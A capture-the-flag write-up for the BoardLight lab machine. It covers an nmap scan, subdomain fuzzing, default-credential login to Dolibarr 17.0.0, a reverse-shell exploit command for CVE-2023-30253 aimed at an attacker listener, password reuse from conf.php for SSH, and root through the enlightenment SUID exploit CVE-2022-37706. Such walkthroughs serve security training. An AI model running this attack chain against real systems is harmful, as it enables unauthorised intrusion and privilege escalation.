BoardLight - Writeup
BoardLight
Reconnaissance
IP: 10.10.11.11
NMAP
nmap -T4 -p- -A 10.10.11.11
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-02 10:20 UTC
Nmap scan report for 10.10.11.11
Host is up (0.031s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
| 256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_ 256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.14
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 30.84 ms 10.10.14.1
2 30.95 ms 10.10.11.11
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.53 seconds
Website
Site
on bottom I spot page name board.htb, add it to /etc/hosts
I notice page is in php, contact us redirect us to home page, login also. Starting directory busting but nothing usefull, next subdomain brute force and I found crm
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.Board.htb" -u http://Board.htb -fs 15949
Great we go login panel to Dolibarr 17.0.0
tried default creds admin:admin and we manage to login however it says access denied
searching google I found CVE-2023-30253. Dolibarr before 17.0.1 allows remote code execution by an authenticated user via an uppercase manipulation:
<?PHP instead of <?php in injected data
https://nvd.nist.gov/vuln/detail/CVE-2023-30253 Poc: https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253
python3 exploit.py http://crm.board.htb admin admin 10.10.14.8 4444
Gaining Access
Start with searching for configuration files of dolibarr
/var/www/html/crm.board.htb/htdocs/conf$ cat conf.php
dolibarrowner serverfun2$2023!! Password reused by larissa, now we can connect via ssh
Privilege Escalation
Sudo have vulerable version but we cannot run sudo so it is rabbit hole, next I ran linpeas and found promising SUID
to confirm we can check version
enlightenment before 0.25.4 cve-2022-37706 Copy exploit on target machine and run https://nvd.nist.gov/vuln/detail/CVE-2022-37706 PoC: https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit
we have root shell